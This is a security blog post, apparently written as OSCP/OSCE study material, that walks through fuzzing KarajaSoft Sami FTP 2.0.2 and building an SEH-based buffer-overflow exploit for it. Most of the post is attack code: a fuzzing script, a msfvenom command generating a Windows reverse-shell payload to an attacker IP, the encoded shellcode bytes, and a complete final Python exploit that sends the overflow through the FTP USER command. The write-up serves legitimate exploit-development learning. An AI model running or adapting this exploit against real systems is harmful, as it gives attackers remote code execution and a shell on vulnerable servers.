<!DOCTYPE html><html lang="en" mode="light" > <!-- The Head v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title>Karajasoft Sami 2.0.2 Ftp Bof |</title><meta name="generator" content="Jekyll v4.1.1" /><meta property="og:title" content="Karajasoft Sami 2.0.2 Ftp Bof" /><meta name="author" content="Stipe Marinovic" /><meta property="og:locale" content="en_US" /><meta name="description" content="– title: KarajaSoft Sami FTP 2.0.2 buffer overflow exploit author: Stipe Marinovic date: 2020-08-01 06:00:00 +0800 categories: [Blogging, Tutorial, Exploit, SEH] tags: [fuzzing, shellcoding, exploit, bufferoverflow, bof, SEH] toc: true —" /><meta property="og:description" content="– title: KarajaSoft Sami FTP 2.0.2 buffer overflow exploit author: Stipe Marinovic date: 2020-08-01 06:00:00 +0800 categories: [Blogging, Tutorial, Exploit, SEH] tags: [fuzzing, shellcoding, exploit, bufferoverflow, bof, SEH] toc: true —" /><link rel="canonical" href="https://smarinovic.github.io/posts/KarajaSoft-Sami-2.0.2-FTP-BoF/" /><meta property="og:url" content="https://smarinovic.github.io/posts/KarajaSoft-Sami-2.0.2-FTP-BoF/" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2020-08-01T00:00:00+02:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="Karajasoft Sami 2.0.2 Ftp Bof" /><meta name="twitter:site" content="@stipemarinovic" /><meta name="twitter:creator" content="@Stipe Marinovic" /> <script type="application/ld+json"> {"@type":"BlogPosting","url":"https://smarinovic.github.io/posts/KarajaSoft-Sami-2.0.2-FTP-BoF/","headline":"Karajasoft Sami 2.0.2 Ftp Bof","dateModified":"2020-08-01T00:00:00+02:00","datePublished":"2020-08-01T00:00:00+02:00","author":{"@type":"Person","name":"Stipe Marinovic"},"mainEntityOfPage":{"@type":"WebPage","@id":"https://smarinovic.github.io/posts/KarajaSoft-Sami-2.0.2-FTP-BoF/"},"description":"– title: KarajaSoft Sami FTP 2.0.2 buffer overflow exploit author: Stipe Marinovic date: 2020-08-01 06:00:00 +0800 categories: [Blogging, Tutorial, Exploit, SEH] tags: [fuzzing, shellcoding, exploit, bufferoverflow, bof, SEH] toc: true —","@context":"https://schema.org"}</script> <!-- The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps Generated by: https://www.favicon-generator.org/ v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT license --><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon.png"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon-precomposed.png"><link rel="apple-touch-icon" sizes="57x57" href="/assets/img/favicons/apple-icon-57x57.png"><link rel="apple-touch-icon" sizes="60x60" href="/assets/img/favicons/apple-icon-60x60.png"><link rel="apple-touch-icon" sizes="72x72" href="/assets/img/favicons/apple-icon-72x72.png"><link rel="apple-touch-icon" sizes="76x76" href="/assets/img/favicons/apple-icon-76x76.png"><link rel="apple-touch-icon" sizes="114x114" href="/assets/img/favicons/apple-icon-114x114.png"><link rel="apple-touch-icon" sizes="120x120" href="/assets/img/favicons/apple-icon-120x120.png"><link rel="apple-touch-icon" sizes="144x144" href="/assets/img/favicons/apple-icon-144x144.png"><link rel="apple-touch-icon" sizes="152x152" href="/assets/img/favicons/apple-icon-152x152.png"><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-icon-180x180.png"><link rel="icon" type="image/png" sizes="192x192" href="/assets/img/favicons/android-icon-192x192.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="96x96" href="/assets/img/favicons/favicon-96x96.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/manifest.json"><meta name='msapplication-config' content='/assets/img/favicons/browserconfig.xml'><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-TileImage" content="/assets/img/favicons/ms-icon-144x144.png"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials"><link rel="dns-prefetch" href="https://www.google-analytics.com"><link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><link rel="preconnect" href="cdn.jsdelivr.net"><link rel="dns-prefetch" href="cdn.jsdelivr.net"><link rel="preload" as="style" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin><link rel="preload" as="style" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"><link rel="preload" as="style" href="/assets/css/main.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"><link rel="stylesheet" href="/assets/css/main.css"><link rel="preload" as="script" href="https://cdn.jsdelivr.net/npm/jquery@3.4.1/dist/jquery.min.js" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"><link rel="preload" as="script" href="https://cdn.jsdelivr.net/npm/popper.js@1.15.0/dist/umd/popper.min.js" integrity="sha256-fTuUgtT7O2rqoImwjrhDgbXTKUwyxxujIMRIK7TbuNU=" crossorigin> <script src="https://cdn.jsdelivr.net/npm/jquery@3.4.1/dist/jquery.min.js" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"></script> <script> window.jQuery || document.write('<script src="/assets/lib/jquery-3.4.1.min.js"><\/script>'); </script> <script src="https://cdn.jsdelivr.net/npm/popper.js@1.15.0/dist/umd/popper.min.js" integrity="sha256-fTuUgtT7O2rqoImwjrhDgbXTKUwyxxujIMRIK7TbuNU=" crossorigin="anonymous"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/js/bootstrap.min.js" integrity="sha256-5+02zu5UULQkO7w1GIr6vftCgMfFdZcAHeDtFnKZsBs=" crossorigin="anonymous" async></script> <script src="/assets/js/dist/commons.js" async></script> <script src="/assets/js/dist/timeago.min.js" async></script><link rel="preload" as="style" href="/assets/css/post.css"><link rel="preload" as="style" href="/assets/css/syntax.css"><link rel="stylesheet" href="/assets/css/post.css"><link rel="stylesheet" href="/assets/css/syntax.css"><link rel="preload" as="style" href="/assets/lib/bootstrap-toc-1.0.1/bootstrap-toc.min.css"><link rel="preload" as="script" href="/assets/lib/bootstrap-toc-1.0.1/bootstrap-toc.min.js"><link rel="stylesheet" href="/assets/lib/bootstrap-toc-1.0.1/bootstrap-toc.min.css" /> <script src="/assets/lib/bootstrap-toc-1.0.1/bootstrap-toc.min.js" async></script> <script src="/assets/js/dist/toc.min.js" async></script> <script src="/assets/js/dist/tooltip-loader.min.js" async></script><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column"> <!-- The Side Bar v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="nav-wrapper"><div id="profile-wrapper" class="d-flex flex-column"><div id="avatar" class="d-flex justify-content-center"> <a href="/" alt="avatar"> <img src="/assets/img/commons/profil.jpg" alt="avatar"> </a></div><div class="profile-text mt-3"><div id="site-title"> <a href="/"></a></div><div id="site-subtitle" class="font-italic">HTB writeups, OSCP, OSCE study resources</div></div></div><ul class="nav flex-column"><li class="nav-item d-flex justify-content-center "> <a href="/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-home ml-3 mr-3 unloaded"></i> <span>HOME</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/categories/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-stream ml-3 mr-3 unloaded"></i> <span>CATEGORIES</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/tags/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-tags ml-3 mr-3 unloaded"></i> <span>TAGS</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/archives/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-archive ml-3 mr-3 unloaded"></i> <span>ARCHIVES</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/about/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-info ml-3 mr-3 unloaded"></i> <span>ABOUT</span> </a></li></ul></div><div class="sidebar-bottom d-flex flex-wrap justify-content-around mt-4"> <a href="https://github.com/smarinovic" target="_blank"> <i class="fab fa-github-alt"></i> </a> <a href="https://twitter.com/stipemarinovic" target="_blank"> <i class="fab fa-twitter"></i> </a> <a href="javascript:window.open('mailto:' + ['stipe.marinovic','protonmail.com'].join('@'))"> <i class="fas fa-envelope"></i> </a> <a href="/feed.xml" target="_blank"> <i class="fas fa-rss"></i> </a></div></div><!-- The Top Bar v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Posts </a> </span> <span>Karajasoft Sami 2.0.2 Ftp Bof</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"> <!-- Fixed kramdown code highlight rendering: https://github.com/penibelst/jekyll-compress-html/issues/101 https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901 --><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>Karajasoft Sami 2.0.2 Ftp Bof</h1><div class="post-meta text-muted d-flex flex-column"><div> Posted <span class="timeago" data-toggle="tooltip" data-placement="bottom" title="Sat, Aug 1, 2020, 12:00 AM +0200"> Aug 1, 2020 <i class="unloaded">2020-08-01T00:00:00+02:00</i> </span> by <span class="author"> Stipe Marinovic </span></div></div><div class="post-content"><p>– title: KarajaSoft Sami FTP 2.0.2 buffer overflow exploit author: Stipe Marinovic date: 2020-08-01 06:00:00 +0800 categories: [Blogging, Tutorial, Exploit, SEH] tags: [fuzzing, shellcoding, exploit, bufferoverflow, bof, SEH] toc: true —</p><h2 id="introduction">Introduction</h2><p>In this blog post we will go thru finding vulnerability in KarajaSoft Sami FTP 2.0.2 application and (re)writing exploit. Finding vulnerability in this application is a bit tricky without looking at existing exploits as it requires user interaction to actually trigger vulnerability and exploit. More on this in following chapters.</p><p>Application can be downloaded from following url: <a href="https://web.archive.org/web/20070104022116/http://www.karjasoft.com/files/samiftp/samiftpd_install.exe">https://web.archive.org/web/20070104022116/http://www.karjasoft.com/files/samiftp/samiftpd_install.exe</a></p><h2 id="fuzzing">Fuzzing</h2><p>If we just start application and try to fuzz USER or PASS commands, which are the first two commands we send when connecting to the server, application will most probably not crash, at least not in a useful way. The reason for such behaviour is that vulnerability exists in function responsible for displaying log data in GUI. When user/administrator opens log, vulnerable part of application reads data from log file and crash occurs. If GUI is not opened at the time of fuzzing - application won’t crash.</p><p><img class="lozad" src= /assets/img/commons/loading.png data-src="https://github.com/smarinovic/smarinovic.github.io/blob/master/assets/img/sami01.png" alt="KarajaSoft Sami FTP BoF" /></p><p>Also, application stores log in <code class="language-plaintext highlighter-rouge">SamiFTP.binlog</code> file located at: <code class="language-plaintext highlighter-rouge">C:\Program Files\PMSystem\Plugins\Sami FTP Server\</code>. Be sure to delete that file after the crash occurs as payload is stored in that file and every user access to log will load payload from file and crash application.</p><p><img class="lozad" src= /assets/img/commons/loading.png data-src="https://github.com/smarinovic/smarinovic.github.io/blob/master/assets/img/sami02.png" alt="KarajaSoft Sami FTP BoF" /></p><p>BooFuzz fuzzer didn’t manage to crash application in useful way but it did record some anomalies (application would stop responding) when fuzzing USER command. In order to dig deeper we can create simple fuzzing script which would run a loop increasing payload length by 2 chars.</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
</pre><td class="rouge-code"><pre>import socket

host = "172.16.24.213"
port = 21

for x in range (500,10000):
   buffer = "USER " + x * "AA" +  "\r\n"
   buffer += "PASS pero\r\n"
   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   s.connect((host,port))
   banner = s.recv(1024)
   s.send(buffer)
   print (str(x))
   x=x+1
   s.close()

print ("[+] Payload sent")
</pre></table></code></div></div><p>Application crashed when fuzzer sent 506 double “AA” charactes. We used two A characters to speed up fuzzing.</p><p><img class="lozad" src= /assets/img/commons/loading.png data-src="https://github.com/smarinovic/smarinovic.github.io/blob/master/assets/img/sami03.png" alt="KarajaSoft Sami FTP BoF" /></p><p><img class="lozad" src= /assets/img/commons/loading.png data-src="https://github.com/smarinovic/smarinovic.github.io/blob/master/assets/img/sami04.png" alt="KarajaSoft Sami FTP BoF" /></p><p>Great, SEH is overwritten with “A” values:</p><p><img class="lozad" src= /assets/img/commons/loading.png data-src="https://github.com/smarinovic/smarinovic.github.io/blob/master/assets/img/sami05.png" alt="KarajaSoft Sami FTP BoF" /></p><h2 id="finding-seh-location">Finding SEH location</h2><p>Next steps are the same as in any other buferoverflow exploit. These steps are explained in previous blog posts (BigAnt server, Easy Chat server, MinaliC etc.).</p><ul><li>SEH location</li></ul><p><img class="lozad" src= /assets/img/commons/loading.png data-src="https://github.com/smarinovic/smarinovic.github.io/blob/master/assets/img/sami06.png" alt="KarajaSoft Sami FTP BoF" /></p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>root@kali32bit:~/repository/ctp/ftp# msf-pattern_offset -l 1020 -q 41307541
[*] Exact match at offset 600
</pre></table></code></div></div><ul><li>Bad chars</li></ul><p>Following chars were found to be bad: <code class="language-plaintext highlighter-rouge">\x00\x0a\x0d\x2f</code>.</p><ul><li>POP,POP,RET address</li></ul><p>Mona was used to find address with POP, POP, RET instruction set. Luckily one of the addresses is located in application dll (tmp0.dll) so exploit won’t be dependant on operating system service pack or language version.</p><p><code class="language-plaintext highlighter-rouge">0x1001fcd7 : pop esi # pop ebx # retn | {PAGE_EXECUTE_READWRITE} [tmp0.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\PMSystem\Temp\tmp0.dll)</code></p><h2 id="reverse-shell">Reverse shell</h2><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
</pre><td class="rouge-code"><pre>msfvenom -p windows/shell_reverse_tcp LHOST=172.16.24.204 LPORT=4444 -f python -a x86 -b "\x00\x0a\x0d\x2f"
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of python file: 1712 bytes
buf =  b""
buf += b"\xb8\x3e\xf0\x27\x32\xdb\xdb\xd9\x74\x24\xf4\x5a\x2b"
buf += b"\xc9\xb1\x52\x83\xea\xfc\x31\x42\x0e\x03\x7c\xfe\xc5"
buf += b"\xc7\x7c\x16\x8b\x28\x7c\xe7\xec\xa1\x99\xd6\x2c\xd5"
buf += b"\xea\x49\x9d\x9d\xbe\x65\x56\xf3\x2a\xfd\x1a\xdc\x5d"
buf += b"\xb6\x91\x3a\x50\x47\x89\x7f\xf3\xcb\xd0\x53\xd3\xf2"
buf += b"\x1a\xa6\x12\x32\x46\x4b\x46\xeb\x0c\xfe\x76\x98\x59"
buf += b"\xc3\xfd\xd2\x4c\x43\xe2\xa3\x6f\x62\xb5\xb8\x29\xa4"
buf += b"\x34\x6c\x42\xed\x2e\x71\x6f\xa7\xc5\x41\x1b\x36\x0f"
buf += b"\x98\xe4\x95\x6e\x14\x17\xe7\xb7\x93\xc8\x92\xc1\xe7"
buf += b"\x75\xa5\x16\x95\xa1\x20\x8c\x3d\x21\x92\x68\xbf\xe6"
buf += b"\x45\xfb\xb3\x43\x01\xa3\xd7\x52\xc6\xd8\xec\xdf\xe9"
buf += b"\x0e\x65\x9b\xcd\x8a\x2d\x7f\x6f\x8b\x8b\x2e\x90\xcb"
buf += b"\x73\x8e\x34\x80\x9e\xdb\x44\xcb\xf6\x28\x65\xf3\x06"
buf += b"\x27\xfe\x80\x34\xe8\x54\x0e\x75\x61\x73\xc9\x7a\x58"
buf += b"\xc3\x45\x85\x63\x34\x4c\x42\x37\x64\xe6\x63\x38\xef"
buf += b"\xf6\x8c\xed\xa0\xa6\x22\x5e\x01\x16\x83\x0e\xe9\x7c"
buf += b"\x0c\x70\x09\x7f\xc6\x19\xa0\x7a\x81\x89\x25\x9c\x9d"
buf += b"\xba\x47\x9c\x0c\x67\xc1\x7a\x44\x87\x87\xd5\xf1\x3e"
buf += b"\x82\xad\x60\xbe\x18\xc8\xa3\x34\xaf\x2d\x6d\xbd\xda"
buf += b"\x3d\x1a\x4d\x91\x1f\x8d\x52\x0f\x37\x51\xc0\xd4\xc7"
buf += b"\x1c\xf9\x42\x90\x49\xcf\x9a\x74\x64\x76\x35\x6a\x75"
buf += b"\xee\x7e\x2e\xa2\xd3\x81\xaf\x27\x6f\xa6\xbf\xf1\x70"
buf += b"\xe2\xeb\xad\x26\xbc\x45\x08\x91\x0e\x3f\xc2\x4e\xd9"
buf += b"\xd7\x93\xbc\xda\xa1\x9b\xe8\xac\x4d\x2d\x45\xe9\x72"
buf += b"\x82\x01\xfd\x0b\xfe\xb1\x02\xc6\xba\xc2\x48\x4a\xea"
buf += b"\x4a\x15\x1f\xae\x16\xa6\xca\xed\x2e\x25\xfe\x8d\xd4"
buf += b"\x35\x8b\x88\x91\xf1\x60\xe1\x8a\x97\x86\x56\xaa\xbd"
</pre></table></code></div></div><h2 id="final-exploit">Final exploit</h2><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
</pre><td class="rouge-code"><pre>#!/usr/bin/python

import socket

host = "172.16.24.213"
port = 21

# POP, POP, RET: 0x1001fcd7
SEH = "\xd7\xfc\x01\x10"
JMP = "\xeb\x07"

buf =  b""
buf += b"\xb8\x3e\xf0\x27\x32\xdb\xdb\xd9\x74\x24\xf4\x5a\x2b"
buf += b"\xc9\xb1\x52\x83\xea\xfc\x31\x42\x0e\x03\x7c\xfe\xc5"
buf += b"\xc7\x7c\x16\x8b\x28\x7c\xe7\xec\xa1\x99\xd6\x2c\xd5"
buf += b"\xea\x49\x9d\x9d\xbe\x65\x56\xf3\x2a\xfd\x1a\xdc\x5d"
buf += b"\xb6\x91\x3a\x50\x47\x89\x7f\xf3\xcb\xd0\x53\xd3\xf2"
buf += b"\x1a\xa6\x12\x32\x46\x4b\x46\xeb\x0c\xfe\x76\x98\x59"
buf += b"\xc3\xfd\xd2\x4c\x43\xe2\xa3\x6f\x62\xb5\xb8\x29\xa4"
buf += b"\x34\x6c\x42\xed\x2e\x71\x6f\xa7\xc5\x41\x1b\x36\x0f"
buf += b"\x98\xe4\x95\x6e\x14\x17\xe7\xb7\x93\xc8\x92\xc1\xe7"
buf += b"\x75\xa5\x16\x95\xa1\x20\x8c\x3d\x21\x92\x68\xbf\xe6"
buf += b"\x45\xfb\xb3\x43\x01\xa3\xd7\x52\xc6\xd8\xec\xdf\xe9"
buf += b"\x0e\x65\x9b\xcd\x8a\x2d\x7f\x6f\x8b\x8b\x2e\x90\xcb"
buf += b"\x73\x8e\x34\x80\x9e\xdb\x44\xcb\xf6\x28\x65\xf3\x06"
buf += b"\x27\xfe\x80\x34\xe8\x54\x0e\x75\x61\x73\xc9\x7a\x58"
buf += b"\xc3\x45\x85\x63\x34\x4c\x42\x37\x64\xe6\x63\x38\xef"
buf += b"\xf6\x8c\xed\xa0\xa6\x22\x5e\x01\x16\x83\x0e\xe9\x7c"
buf += b"\x0c\x70\x09\x7f\xc6\x19\xa0\x7a\x81\x89\x25\x9c\x9d"
buf += b"\xba\x47\x9c\x0c\x67\xc1\x7a\x44\x87\x87\xd5\xf1\x3e"
buf += b"\x82\xad\x60\xbe\x18\xc8\xa3\x34\xaf\x2d\x6d\xbd\xda"
buf += b"\x3d\x1a\x4d\x91\x1f\x8d\x52\x0f\x37\x51\xc0\xd4\xc7"
buf += b"\x1c\xf9\x42\x90\x49\xcf\x9a\x74\x64\x76\x35\x6a\x75"
buf += b"\xee\x7e\x2e\xa2\xd3\x81\xaf\x27\x6f\xa6\xbf\xf1\x70"
buf += b"\xe2\xeb\xad\x26\xbc\x45\x08\x91\x0e\x3f\xc2\x4e\xd9"
buf += b"\xd7\x93\xbc\xda\xa1\x9b\xe8\xac\x4d\x2d\x45\xe9\x72"
buf += b"\x82\x01\xfd\x0b\xfe\xb1\x02\xc6\xba\xc2\x48\x4a\xea"
buf += b"\x4a\x15\x1f\xae\x16\xa6\xca\xed\x2e\x25\xfe\x8d\xd4"
buf += b"\x35\x8b\x88\x91\xf1\x60\xe1\x8a\x97\x86\x56\xaa\xbd"

buffer = "USER " + (600 - len(JMP)) * "\x90" + JMP + SEH + "\x90" * 10 + buf + (1020 - 600 - len(JMP) - len(SEH) - 10 - len(buf)) * "\x90" + "\r\n"
buffer += "PASS pero\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
banner = s.recv(1024)
s.send(buffer)
s.close()

print ("[+] Payload sent")
</pre></table></code></div></div><p>Result:</p><p><img class="lozad" src= /assets/img/commons/loading.png data-src="https://github.com/smarinovic/smarinovic.github.io/blob/master/assets/img/sami07.png" alt="KarajaSoft Sami FTP BoF" /></p><p><img class="lozad" src= /assets/img/commons/loading.png data-src="https://github.com/smarinovic/smarinovic.github.io/blob/master/assets/img/sami08.png" alt="KarajaSoft Sami FTP BoF" /></p></div><div class="post-tail-wrapper text-muted"><div class="post-tail-bottom d-flex justify-content-between align-items-center pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/">CC BY 4.0</a> by the author.</div><!-- Post sharing snippet v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT License --><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Karajasoft Sami 2.0.2 Ftp Bof - &url=https://smarinovic.github.io/posts/KarajaSoft-Sami-2.0.2-FTP-BoF/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Karajasoft Sami 2.0.2 Ftp Bof - &u=https://smarinovic.github.io/posts/KarajaSoft-Sami-2.0.2-FTP-BoF/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://telegram.me/share?text=Karajasoft Sami 2.0.2 Ftp Bof - &url=https://smarinovic.github.io/posts/KarajaSoft-Sami-2.0.2-FTP-BoF/" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank"> <i class="fa-fw fab fa-telegram"></i> </a> <i class="fa-fw fas fa-link small" onclick="copyLink()" data-toggle="tooltip" data-placement="top" title="Copy link"></i> </span></div></div></div></div></div><!-- The Pannel on right side (Desktop views) v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div class="access"><div id="access-tags"><h3 data-toc-skip>Trending Tags</h3><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <!-- The trending tags list v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung MIT Licensed --> <a class="post-tag" href="/tags/shellcoding/">shellcoding</a> <a class="post-tag" href="/tags/slae/">slae</a> <a class="post-tag" href="/tags/fuzzing/">fuzzing</a> <a class="post-tag" href="/tags/exploit/">exploit</a> <a class="post-tag" href="/tags/bufferoverflow/">bufferoverflow</a> <a class="post-tag" href="/tags/bof/">bof</a> <a class="post-tag" href="/tags/encoder/">encoder</a> <a class="post-tag" href="/tags/egghunter/">egghunter</a> <a class="post-tag" href="/tags/decoder/">decoder</a> <a class="post-tag" href="/tags/seh/">SEH</a></div></div></div><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><h3 data-toc-skip class="pl-3 pt-2 mb-3">Contents</h3><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div id="post-extend-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"> <!-- Navigation buttons at the bottom of the post. v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --><div class="post-navigation d-flex justify-content-between"> <a href="/posts/BigAnt-server-BoF/" class="btn btn-outline-primary"><p>BigAnt server 2.52 buffer overflow exploit</p></a> <span class="btn btn-outline-primary disabled"><p>-</p></span></div><!-- The related posts of current post. Placed in the bottom of every single post. v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT License --></div></div></div><script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script> <script type="text/javascript"> const observer = lozad(); observer.observe(); </script> <!-- The Footer v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"><p class="mb-0"> © 2020 <a href="https://twitter.com/stipemarinovic">Stipe Marinovic</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank">Jekyll</a> with theme <a href="https://github.com/cotes2020/jekyll-theme-chirpy/">Chirpy</a>.</p></div></div></footer></div><!-- The Search results v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-xl-11 post-content"><div id="search-hints"><h4 class="text-muted">Trending Tags</h4><!-- The trending tags list v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung MIT Licensed --> <a class="post-tag" href="/tags/shellcoding/">shellcoding</a> <a class="post-tag" href="/tags/slae/">slae</a> <a class="post-tag" href="/tags/fuzzing/">fuzzing</a> <a class="post-tag" href="/tags/exploit/">exploit</a> <a class="post-tag" href="/tags/bufferoverflow/">bufferoverflow</a> <a class="post-tag" href="/tags/bof/">bof</a> <a class="post-tag" href="/tags/encoder/">encoder</a> <a class="post-tag" href="/tags/egghunter/">egghunter</a> <a class="post-tag" href="/tags/decoder/">decoder</a> <a class="post-tag" href="/tags/seh/">SEH</a></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <!-- The GA snippet v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-11473652-4', 'auto'); ga('send', 'pageview'); </script> <!-- Jekyll Simple Search loader v2.0 